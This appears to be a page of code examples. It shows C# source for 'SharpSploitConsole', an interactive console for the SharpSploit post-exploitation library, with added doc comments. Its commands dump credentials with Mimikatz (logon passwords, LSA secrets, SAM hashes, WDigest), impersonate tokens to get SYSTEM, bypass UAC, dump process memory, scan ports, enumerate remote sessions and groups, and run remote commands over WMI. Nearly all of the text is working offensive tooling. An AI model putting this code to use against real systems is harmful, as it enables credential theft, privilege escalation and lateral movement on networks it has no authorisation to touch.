예제 #1
        /// <summary>
        /// Calls <c>SharpSploit.Enumeration.Net.GetNetSessions</c> and writes each returned entry to the console.
        /// </summary>
        /// <param name="request">
        /// Positional tokens. Elements [2] and [3] are passed to the <c>Credential</c> constructor
        /// (presumably username and password; confirm against the caller) and element [1] is passed
        /// as the first argument of <c>GetNetSessions</c>. Element [0] is not read here.
        /// </param>
        /// <remarks>
        /// No length check is performed, so an array with fewer than four elements surfaces as an
        /// <see cref="IndexOutOfRangeException"/> in the caller.
        /// </remarks>
        private static void netSessions(String[] request)
        {
            // Build the credential first, exactly as the tokens arrive; nothing is trimmed or validated.
            var credential = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
            var sessions   = SharpSploit.Enumeration.Net.GetNetSessions(request[1], credential);

            // One console line per returned entry.
            foreach (var session in sessions)
            {
                Console.WriteLine(session);
            }
        }
예제 #2
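        /// <summary>
        /// Builds a <c>DomainSearcher</c> from "-flag value" style arguments.
        /// </summary>
        /// <remarks>
        /// Recognised flags, matched case-insensitively: <c>-username</c>, <c>-password</c>, <c>-domain</c>,
        /// <c>-server</c>, <c>-searchbase</c>, <c>-searchstring</c>. The value of a flag is the element that
        /// directly follows it. Search scope (Subtree), page size (200), server time limit (default),
        /// tombstone (false) and security masks (0) are fixed and cannot be set from <paramref name="args"/>.
        /// </remarks>
        /// <param name="args">Raw argument tokens to scan for the flags listed above.</param>
        /// <returns>
        /// The configured searcher, or <c>null</c> when <c>-username</c> is supplied without
        /// <c>-password</c>, or when any exception is raised while parsing or constructing the searcher
        /// (for example a flag given as the last token with no value after it).
        /// </returns>
        private static SharpSploit.Enumeration.Domain.DomainSearcher searcherBuilder(string[] args)
        {
            try
            {
                SharpSploit.Enumeration.Domain.Credential creds = null;
                string domain = "", server = "", searchBase = "", searchString = "";
                System.DirectoryServices.SearchScope searchScope = System.DirectoryServices.SearchScope.Subtree;
                int      resultPageSize  = 200;
                TimeSpan serverTimeLimit = default(TimeSpan);
                bool     tombStone       = false;
                System.DirectoryServices.SecurityMasks securityMasks = 0;

                string[] argsLower = args.Select(s => s.ToLowerInvariant()).ToArray();

                // Each flag is located in the lower-cased copy and that same index is used to read the
                // value from the original array. Looking the flag up again in the original array is
                // case-sensitive: a flag typed as "-Username" would not be found there, the lookup would
                // yield -1, and element 0 would be taken as the value.
                int usernameIndex = Array.IndexOf(argsLower, "-username");
                if (usernameIndex > -1)
                {
                    int passwordIndex = Array.IndexOf(argsLower, "-password");
                    if (passwordIndex > -1)
                    {
                        // The password is deliberately not written to the console: console output can be
                        // captured in transcripts, scrollback or redirected logs.
                        creds = new SharpSploit.Enumeration.Domain.Credential(args[usernameIndex + 1], args[passwordIndex + 1]);
                    }
                    else
                    {
                        Console.WriteLine("Error, if providing credentials you must provide both a username and password");
                        return null;
                    }
                }

                int domainIndex = Array.IndexOf(argsLower, "-domain");
                if (domainIndex > -1)
                {
                    domain = args[domainIndex + 1];
                }

                int serverIndex = Array.IndexOf(argsLower, "-server");
                if (serverIndex > -1)
                {
                    server = args[serverIndex + 1];
                }

                int searchBaseIndex = Array.IndexOf(argsLower, "-searchbase");
                if (searchBaseIndex > -1)
                {
                    searchBase = args[searchBaseIndex + 1];
                }

                int searchStringIndex = Array.IndexOf(argsLower, "-searchstring");
                if (searchStringIndex > -1)
                {
                    searchString = args[searchStringIndex + 1];
                }

                var gather = new SharpSploit.Enumeration.Domain.DomainSearcher(creds, domain, server, searchBase, searchString, searchScope, resultPageSize, serverTimeLimit, tombStone, securityMasks);
                return gather;
            }
            catch
            {
                // Best-effort by design: every failure (null args, missing value after a flag,
                // constructor error) is reported with the same message and a null result.
                Console.WriteLine("Error Generating Domain Searcher Object");
                return null;
            }
        }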
예제 #3
        /// <summary>
        /// Interactive console loop. Prints a banner when started without arguments, then repeatedly
        /// reads one line, splits it on single spaces and dispatches on the first token to the matching
        /// SharpSploit call, writing the result to the console.
        /// </summary>
        /// <param name="args">Process arguments; only their count is inspected (banner is shown when empty).</param>
        /// <remarks>
        /// Command names are matched case-sensitively. Every handler catches all exceptions and prints
        /// the text returned by <c>ER()</c>, so a missing argument and a failed operation look the same
        /// to the operator. The loop ends only through the "exit" command.
        /// </remarks>
        static void Main(string[] args)
        {
            // Banner is shown only when the program is started without arguments.
            if (args.Length == 0)
            {
                string banner = @"
                           

                                          
                                                                
                         _________.__                         _________      .__         .__  __   
                        /   _____/|  |__ _____ _____________ /   _____/_____ |  |   ____ |__|/  |_ 
                        \_____  \ |  |  \\__  \\_  __ \____ \\_____  \\____ \|  |  /  _ \|  \   __\
                        /        \|   Y  \/ __ \|  | \/  |_> >        \  |_> >  |_(  <_> )  ||  |  
                       /_______  /|___|  (____  /__|  |   __/_______  /   __/|____/\____/|__||__|  
                               \/      \/     \/      |__|          \/|__|                         ";

                // '@' is used as a stand-in for a line break and expanded below.
                string tagline = "@                                                [Console Edition]@@" +
                                 "                                           Written by anthemtotheego@@" +
                                 "@" +
                                 "                                        Type help or ? to show menu options@@@@";
                tagline = tagline.Replace("@", System.Environment.NewLine);

                Console.WriteLine(banner);
                Console.WriteLine(tagline);
            }

            for (;;)
            {
                Console.Write("SharpSploitConsole:> ");

                // RL() supplies the command line and ER() the message printed on any handler failure;
                // both are defined outside this method.
                string line        = RL();
                string failureText = ER();

                // Tokens are positional and separated by a single space, so a value that itself
                // contains a space (a password, a path) is split across several tokens.
                string[] request = line.Split(' ');

                switch (request[0])
                {
                    case "exit":
                        Environment.Exit(0);
                        break;

                    case "help":
                    case "?":
                        string[] helpLines =
                        {
                            "",
                            "SharpSploit Credentials Commands",
                            "--------------------------------",
                            "",
                            "Mimikatz",
                            "--------",
                            "",
                            "Mimi-All                     Executes everything but DCSync - requires admin",
                            "Mimi-Command                 Executes a chosen Mimikatz command",
                            "logonPasswords               Runs privilege::debug sekurlsa::logonPasswords - requires admin",
                            "LsaCache                     Retrieve Domain Cached Credentials hashes from registry - requires admin",
                            "LsaSecrets                   Retrieve LSA secrets stored in registry - requires admin",
                            "SamDump                      Retrieve password hashes from the SAM database - requires admin",
                            "Wdigest                      Retrieve Wdigest credentials from registry",
                            "",
                            "Tokens",
                            "------",
                            "",
                            "whoami                       Retrieve current user",
                            "GetSystem                    Impersonate system user, requires admin rights",
                            "BypassUAC                    Bypass UAC, requires binary, command | path to binary - requires admin rights",
                            "RevertToSelf                 Ends the impersonation of any token, reverts back to initial token associated with current process",
                            "",
                            "SharpSploit Enumeration Commands",
                            "--------------------------------",
                            "",
                            "CurrentDirectory             Retrieve current working directory",
                            "DirectoryListing             Retrieve current directory listing",
                            "ChangeDirectory              Changes the current directory by appending a specified string to the current working directory",
                            "Hostname                     Retrieve hostname",
                            "ProcessList                  Retrieve list of running processes",
                            "ProcDump                     Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin",
                            "Username                     Retrieve current username",
                            "ReadRegistry                 Retrieve registry path value, requires full path argument",
                            "WriteRegistry                Write to registry, requires full path | value",
                            "NetLocalGroupMembers         Retrieve users of local group remotely, requires computername | groupname | username | password",
                            "NetLocalGroups               Retrieve local groups remotely, requires computername | username | password",
                            "NetLoggedOnUsers             Retrieve current logged on users remotely, requires computername| username | password",
                            "NetSessions                  Retrieve user sessions remotely, requires computername | username | password",
                            "Ping                         Ping systems, requires computernames",
                            "PortScan                     Port scan systems, requires computername | ports",
                            "",
                            "SharpSploit Lateral Movement Commands",
                            "--------------------------------",
                            "",
                            "WMI                          Run command remotely via WMI, requires computername | username | password | command - requires admin",
                            "",
                            "",
                        };
                        foreach (string helpLine in helpLines)
                        {
                            Console.WriteLine(helpLine);
                        }
                        break;

                    // ---- Credentials: Mimikatz wrappers ----
                    case "Mimi-All":
                        try
                        {
                            var output = SharpSploit.Credentials.Mimikatz.All();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "Mimi-Command":
                        try
                        {
                            // Everything after the command name is re-joined and passed through as typed.
                            string mimikatzCommand = String.Join(" ", request.Skip(1).ToArray());
                            var output = SharpSploit.Credentials.Mimikatz.Command(mimikatzCommand);
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "logonPasswords":
                        try
                        {
                            var output = SharpSploit.Credentials.Mimikatz.LogonPasswords();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "LsaCache":
                        try
                        {
                            var output = SharpSploit.Credentials.Mimikatz.LsaCache();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "LsaSecrets":
                        try
                        {
                            var output = SharpSploit.Credentials.Mimikatz.LsaSecrets();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "SamDump":
                        try
                        {
                            var output = SharpSploit.Credentials.Mimikatz.SamDump();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "Wdigest":
                        try
                        {
                            var output = SharpSploit.Credentials.Mimikatz.Wdigest();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    // ---- Credentials: token operations ----
                    case "whoami":
                        try
                        {
                            var tokens = new SharpSploit.Credentials.Tokens();
                            var output = tokens.WhoAmI();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "GetSystem":
                        try
                        {
                            var tokens = new SharpSploit.Credentials.Tokens();
                            var output = tokens.GetSystem();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "BypassUAC":
                        try
                        {
                            var tokens = new SharpSploit.Credentials.Tokens();
                            int processId = 0;
                            // The return value is not printed for this command.
                            tokens.BypassUAC(request[1], request[2], request[3], processId);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "RevertToSelf":
                        try
                        {
                            var tokens = new SharpSploit.Credentials.Tokens();
                            var output = tokens.RevertToSelf();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    // ---- Enumeration: local host ----
                    case "CurrentDirectory":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.GetCurrentDirectory();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "DirectoryListing":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.GetDirectoryListing();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "ChangeDirectory":
                        try
                        {
                            SharpSploit.Enumeration.Host.ChangeCurrentDirectory(request[1]);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "Hostname":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.GetHostname();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "ProcessList":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.GetProcessList();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "ProcDump":
                        try
                        {
                            // A non-numeric PID makes Parse throw, which lands in the generic handler.
                            int processId = int.Parse(request[1]);
                            SharpSploit.Enumeration.Host.CreateProcessDump(processId, request[2], request[3]);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "Username":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.GetUsername();
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "ReadRegistry":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.RegistryRead(request[1]);
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "WriteRegistry":
                        try
                        {
                            var output = SharpSploit.Enumeration.Host.RegistryWrite(request[1], request[2]);
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    // ---- Enumeration: remote, with explicit credentials ----
                    case "NetLocalGroupMembers":
                        try
                        {
                            var credential = new SharpSploit.Enumeration.Domain.Credential(request[3], request[4]);
                            var members    = SharpSploit.Enumeration.Net.GetNetLocalGroupMembers(request[1], request[2], credential);
                            foreach (var member in members)
                            {
                                Console.WriteLine(member);
                            }
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "NetLocalGroups":
                        try
                        {
                            var credential = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
                            var groups     = SharpSploit.Enumeration.Net.GetNetLocalGroups(request[1], credential);
                            foreach (var group in groups)
                            {
                                Console.WriteLine(group);
                            }
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "NetLoggedOnUsers":
                        try
                        {
                            var credential = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
                            var users      = SharpSploit.Enumeration.Net.GetNetLoggedOnUsers(request[1], credential);
                            foreach (var user in users)
                            {
                                Console.WriteLine(user);
                            }
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "NetSessions":
                        try
                        {
                            var credential = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]);
                            var sessions   = SharpSploit.Enumeration.Net.GetNetSessions(request[1], credential);
                            foreach (var session in sessions)
                            {
                                Console.WriteLine(session);
                            }
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    // ---- Enumeration: network ----
                    case "Ping":
                        try
                        {
                            int timeout = 250;
                            int threads = 100;
                            List<string> hosts = request.Skip(1).ToList();
                            var output = SharpSploit.Enumeration.Network.Ping(hosts, timeout, threads);
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    case "PortScan":
                        try
                        {
                            int  timeout   = 250;
                            int  threads   = 100;
                            bool pingFirst = true;
                            // Tokens after the computer name are parsed as port numbers; any
                            // non-numeric token throws and is reported by the generic handler.
                            List<string> portTokens = request.Skip(2).ToList();
                            List<int>    ports      = portTokens.Select(int.Parse).ToList();
                            var output = SharpSploit.Enumeration.Network.PortScan(request[1], ports, pingFirst, timeout, threads);
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    // ---- Lateral movement ----
                    case "WMI":
                        try
                        {
                            // Tokens 1-3 are passed positionally; everything from token 4 on is
                            // re-joined into the remote command string.
                            string remoteCommand = String.Join(" ", request.Skip(4).ToArray());
                            var output = SharpSploit.LateralMovement.WMI.WMIExecute(request[1], remoteCommand, request[2], request[3]);
                            Console.WriteLine(output);
                        }
                        catch
                        {
                            Console.WriteLine(failureText);
                        }
                        break;

                    default:
                        Console.WriteLine("unknown command, type help for commandline options");
                        break;
                }
            }
        }